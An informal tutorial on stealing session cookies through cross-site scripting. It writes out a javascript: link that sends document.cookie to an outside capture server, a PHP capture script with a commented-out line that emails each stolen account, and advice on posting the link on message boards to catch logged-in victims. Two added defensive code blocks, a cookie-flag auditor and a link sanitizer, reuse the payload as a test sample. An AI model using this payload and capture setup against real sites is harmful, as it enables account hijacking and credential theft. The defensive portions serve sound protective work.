Article: XSS Hacking
This is an interesting type of hack because of its simplicity, and the fact that many sites are vulnerable to it. XSS stands for Cross-Site Scripting, and it has many less nefarious uses. Ad services on web sites commonly use XSS for reporting impressions and click-throughs.
But that's no fun, so let's get into the good stuff. We are going to use a simple attack to steal a user's active session and possibly their whole account.
First, what you need is a target site, your own web server, and a victim. For the purposes of this article a fake site and this web server will serve the first two purposes, and you will serve the last.
Here is the idea in a nutshell. When you log into a web site (which we will call authenticating from now on), the web site stores a little piece of data on your local computer. This little piece of data, called a cookie, is the ONLY way the web server knows that you are you. So if someone else on another computer had that cookie, the web server would think that they were you as well.
In addition to all that, these cookies sometimes contain even juicier info, like the user name, and sometimes even a password.
The problem is, even though these cookies are always stored on your computer, only the web site which created them may look at them, so by nature they should be safe from other web sites getting at their secret information. We aim to prove them wrong ;)
SO! Our goal with an XSS attack is to trick the victim's computer into sending the cookie with the secret data to a different server than the one it is supposed to go to.
I will describe the attack and why it works, then I will demonstrate it. When you connect to a web site it downloads HTML to your computer. That HTML describes to your web browser (IE or Firefox or whatever) what the web page should look like. Because it is now downloaded to your local computer, the web server you downloaded it from has no way of changing it until you click another link or whatever.
The pioneers of the internet thought this sucked, so they created JavaScript. JavaScript is small pieces of code that are downloaded with the HTML and executed by the web browser. The code can do things like change parts of the HTML (like when you put your mouse over an image and it changes? That's JavaScript).
Now here is the important distinction: because the JavaScript is running locally, on your own computer, it does not have the same restrictions that web servers have; it can access local data however it wants (as long as that data is associated with your web browser). Starting to see where I'm going with this?
So JavaScript can access the cookie for the page it is being executed on!
Now you may ask: but how can we put malicious JavaScript into a page that we have no control over? Ah, grasshopper, now you are starting to get it. The answer is JavaScript injection. You see, a URL (such as http://www.example.com/) is in fact interpreted by the web browser as HTML, and what can be part of HTML? That's right, JavaScript :)
SO! All we need to do is write malicious JavaScript code and get it into a victim's address bar. How do we do that? Links, my friend. Links. Any link you click is sent to the address bar and executed. It could be in an email, an IM, a message board, anywhere.
So what we want the JavaScript to do is grab the cookie information; that's easy enough:
Code: Javascript
document.cookie
That will return a string of text containing everything inside the cookie.
Then we want to send that information somewhere to capture it:
Code: Javascript
document.location='http://www.someserver.com/capture.php?cookie='+document.cookie
That redirects the current document (read: the web page) to your special capture server, with the cookie data appended to the URL.
The last thing to get it all ready is to add:
Code: Javascript
javascript: document.location= 'http://www.someserver.com/capture.php?cookie='+document.cookie
This tells the browser that the text that follows should be executed as JavaScript.
Next we need to set up the script which will capture the stolen data; this is some very simple PHP:
Code: PHP
<?php
// Capture endpoint: whatever arrives in the "cookie" query parameter is printed back.
if( isset( $_GET['cookie'] ) ) {
    print_r( $_GET['cookie'] );
    /* mail( 'youremail@somewhere.com',
             'Another account captured!',
             $_GET['cookie'] ); */
}
?>
All I do here is check if the cookie data was sent, and if it was, I print it to the screen.
Notice the code between /* and */: that means that line of code won't execute, because I don't actually want this fake account info, but it shows how easy it would be to have each stolen account emailed to me.
Now let's demo it!
Type a fake user name and password in the login form below to create a cookie for us to steal:
Now if you followed it all the way through you should see something like this:
Example Cookie Contents:
logon=uname: hi pword: there; PHPSESSID=15164d29cf8b085c95d8cf6554ca7739
The first line is what we are concerned with. Our fake site stores your login credentials in the cookie so that when you return it can read them and log you in automatically, just like many real pages do in some form or another. Let's break down what we see:
"logon=" the name of the cookie is just logon.
Then you see:
"uname: hi pword: there;"
which is my user name and password:
User Name: hi
Password: there
Pretty simple huh?
Now real sites store your user name and password a bit more securely, so the data stored in their cookies probably won't look like this (God, I hope not), but it can still be used to log you in as someone else.
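As an added example (not code from the article), here is what the defending site can do about the cookie itself, which also adds a caveat to the document.cookie step above: the browser hands a script every cookie except those the server marked HttpOnly, so a session cookie set with HttpOnly never ends up in the capture server's query string. The audit below parses Set-Cookie headers for HttpOnly, Secure and SameSite, flags a value that looks like it carries a password, and shows what document.cookie would expose. The headers are constructed samples: the demo's logon cookie beside a hardened PHPSESSID; the function names are my own.

```javascript
// Added example, not code from the article: audit Set-Cookie headers for the flags
// that keep a session cookie out of document.cookie and off plain HTTP, and show
// what document.cookie would expose. The headers below are constructed samples.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are lower-cased; flags without a value become true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter((p) => p.length > 0);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? '' : parts[0].slice(eq + 1);
  const attrs = {};
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name: name.trim(), value, attrs };
}

// List the protections a cookie is missing, plus one content check.
function auditCookie(header) {
  const cookie = parseSetCookie(header);
  const findings = [];
  if (!cookie.attrs.httponly) findings.push('missing HttpOnly: readable through document.cookie');
  if (!cookie.attrs.secure) findings.push('missing Secure: sent over plain HTTP');
  if (!cookie.attrs.samesite) findings.push('missing SameSite: attached to cross-site requests');
  if (/\b(pword|password|passwd)\b/i.test(cookie.value)) {
    findings.push('value appears to carry a password');
  }
  return { name: cookie.name, findings };
}

// Simulate document.cookie: the browser hands scripts every cookie except HttpOnly ones.
function scriptVisibleCookies(headers) {
  return headers
    .map((h) => parseSetCookie(h))
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample: the article's weak "logon" cookie next to a hardened session cookie.
const SAMPLE_HEADERS = [
  'logon=uname: hi pword: there; Path=/',
  'PHPSESSID=15164d29cf8b085c95d8cf6554ca7739; Path=/; HttpOnly; Secure; SameSite=Lax',
];

for (const header of SAMPLE_HEADERS) {
  const { name, findings } = auditCookie(header);
  console.log(`${name}: ${findings.length ? findings.join('; ') : 'ok'}`);
}
console.log('document.cookie would show:', scriptVisibleCookies(SAMPLE_HEADERS));
```

Run against the two sample headers, the logon cookie collects all four findings and is the only thing document.cookie would show; the PHPSESSID cookie passes clean and stays invisible to the script in the address bar. The password check is a heuristic on the cookie value, not a substitute for never putting credentials in a cookie at all.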
And that's about it!
Now the difficulty with the hack is twofold: 1, the person must be at the target site and logged in when they click the link, and 2, you have to get them to click the link.
Both of these problems are usually solved by having the link appear on the site itself somehow. Say, on MySpace you could post the link on their message board or something. This way they are definitely logged in at the site when they click it.
This method comes with some issues, however, because a lot of sites filter for JavaScript. And of course there are more methods to defeat filters, and even methods to get the code to execute without it even being clicked. The war between defender and attacker goes on.
But you want to know the quickest way to defeat this attack? Look at the URL of a link before you click it!
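Added example, not code from the article: the "look at the URL" check written as code, plus the server-side half, which is what a message board should do with a posted link so that a javascript: link never reaches other users' address bars. classifyLink resolves a link against the page it appears on, blocks code-running schemes (javascript:, data:, vbscript:) and script-like fragments, and marks off-site links as suspicious; renderPostedLink turns only plain http(s) links into anchors and HTML-escapes everything else. The board URL and sample links are constructed, with the article's own javascript: link as one of them; the function names are my own.

```javascript
// Added example, not code from the article: what a reader checks before clicking
// a link, and what a message board should do with a posted link before showing it.
// The board URL and the sample links are constructed for the demo.

// Schemes whose "URL" is really code to run, not a page to fetch.
const CODE_SCHEMES = new Set(['javascript:', 'data:', 'vbscript:']);
// Fragments that do not belong in an ordinary link; a triage heuristic, not a sanitizer.
const SUSPICIOUS_FRAGMENTS = ['<script', 'document.cookie', 'document.location'];

// Classify one link relative to the page it appears on.
function classifyLink(href, pageUrl) {
  let url;
  try {
    url = new URL(href, pageUrl); // resolves relative links against the page
  } catch (err) {
    return { verdict: 'blocked', protocol: null, href: null, reasons: ['unparseable URL'] };
  }
  const reasons = [];
  if (CODE_SCHEMES.has(url.protocol)) {
    reasons.push(`scheme ${url.protocol} executes code instead of fetching a page`);
  }
  let decoded = href;
  try { decoded = decodeURIComponent(href); } catch (err) { /* malformed escapes: inspect raw */ }
  const lowered = decoded.toLowerCase();
  const fragments = SUSPICIOUS_FRAGMENTS.filter((f) => lowered.includes(f));
  for (const f of fragments) reasons.push(`contains "${f}"`);
  const offSite = /^https?:$/.test(url.protocol) && url.origin !== new URL(pageUrl).origin;
  if (offSite) reasons.push(`leaves the site for ${url.host}`);
  let verdict = 'ok';
  if (CODE_SCHEMES.has(url.protocol) || fragments.length > 0) verdict = 'blocked';
  else if (offSite) verdict = 'suspicious';
  return { verdict, protocol: url.protocol, href: url.href, reasons };
}

// HTML-escape text so posted content is displayed rather than interpreted.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side rendering of a user-posted link: only plain http(s) links become
// anchors; everything else is shown as inert escaped text, so the board never
// emits a javascript: href for another user to click.
function renderPostedLink(href, pageUrl) {
  const { verdict, protocol, href: normalized } = classifyLink(href, pageUrl);
  const allowed = verdict !== 'blocked' && (protocol === 'http:' || protocol === 'https:');
  if (!allowed) return escapeHtml(href);
  const safe = escapeHtml(normalized);
  return `<a href="${safe}" rel="noopener noreferrer">${safe}</a>`;
}

// Constructed samples: the article's own link, an off-site link, and an ordinary one.
const BOARD_URL = 'http://www.example.com/board';
const SAMPLE_LINKS = [
  "javascript: document.location='http://www.someserver.com/capture.php?cookie='+document.cookie",
  'http://www.someserver.com/capture.php',
  '/profile?id=42',
];

for (const link of SAMPLE_LINKS) {
  const result = classifyLink(link, BOARD_URL);
  console.log(result.verdict.padEnd(10), link, result.reasons.join('; '));
  console.log('  rendered as:', renderPostedLink(link, BOARD_URL));
}
```

The fragment list is a triage aid for readers and for reviewing posted content, not a sanitizer; the defence that holds is escaping on output and refusing non-http(s) hrefs, which renderPostedLink does regardless of what the heuristic catches. A reader applying the same rule by hand needs only the first part: a link whose address begins with javascript: is code, not a destination.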
Anyway, I hope you enjoyed this, happy hacking!
- Adam